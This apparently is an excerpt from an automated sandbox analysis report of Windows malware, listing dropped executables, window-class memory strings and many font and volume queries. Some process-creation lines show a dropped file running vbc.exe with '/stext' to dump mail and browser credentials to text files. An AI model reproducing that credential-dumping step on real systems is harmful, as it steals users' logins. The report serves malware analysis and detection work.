Source: C:\Users\user\AppData\Local\Temp\Tmp.exe	Process created: C:\Users\user\AppData\Roaming\servieda.exe 'C:\Users\user\AppData\Roaming\servieda.exe'
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process created: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe 'C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe'
Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Process created: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe 'C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe'
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'

Source: pgr.exe, 00000002.00000002.608687643.00000000028FB000.00000004.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.602209717.0000000002B5B000.00000004.00000001.sdmp	Binary or memory string: Program Manager
Source: wscript.exe, 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, Tmp.exe, pgr.exe, 00000002.00000002.601249892.0000000000E40000.00000002.00000001.sdmp, servieda.exe, d4c6a6df7bab3dad31763de990c4ed82.exe, tmp87E4.tmp.exe, 0000000C.00000002.600807119.0000000001520000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.602904401.0000000001750000.00000002.00000001.sdmp, Tmp.exe.0.dr	Binary or memory string: Shell_TrayWnd
Source: pgr.exe, 00000002.00000002.601249892.0000000000E40000.00000002.00000001.sdmp, servieda.exe, 00000003.00000002.600919453.0000000000B90000.00000002.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.600807119.0000000001520000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.602904401.0000000001750000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: pgr.exe, 00000002.00000002.608687643.00000000028FB000.00000004.00000001.sdmp	Binary or memory string: Program Manager\|9kr
Source: pgr.exe, 00000002.00000002.601249892.0000000000E40000.00000002.00000001.sdmp, servieda.exe, 00000003.00000002.600919453.0000000000B90000.00000002.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.600807119.0000000001520000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.602904401.0000000001750000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: Tmp.exe, 00000001.00000003.357963237.000000000067B000.00000004.00000001.sdmp	Binary or memory string: Shell_traywndnlp
Source: pgr.exe, 00000002.00000002.601249892.0000000000E40000.00000002.00000001.sdmp, servieda.exe, 00000003.00000002.600919453.0000000000B90000.00000002.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.600807119.0000000001520000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.602904401.0000000001750000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: servieda.exe, 00000003.00000003.369009096.000000000067B000.00000004.00000001.sdmp	Binary or memory string: Shell_traywndG
Source: Tmp.exe, 00000001.00000003.357963237.000000000067B000.00000004.00000001.sdmp, servieda.exe, 00000003.00000003.369009096.000000000067B000.00000004.00000001.sdmp	Binary or memory string: Shell_traywnd8
Source: pgr.exe, 00000002.00000002.608687643.00000000028FB000.00000004.00000001.sdmp	Binary or memory string: Program Manager<
Source: wscript.exe, 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, Tmp.exe, servieda.exe, d4c6a6df7bab3dad31763de990c4ed82.exe, Tmp.exe.0.dr	Binary or memory string: Shell_traywnd

Source: C:\Users\user\AppData\Local\Temp\pgr.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
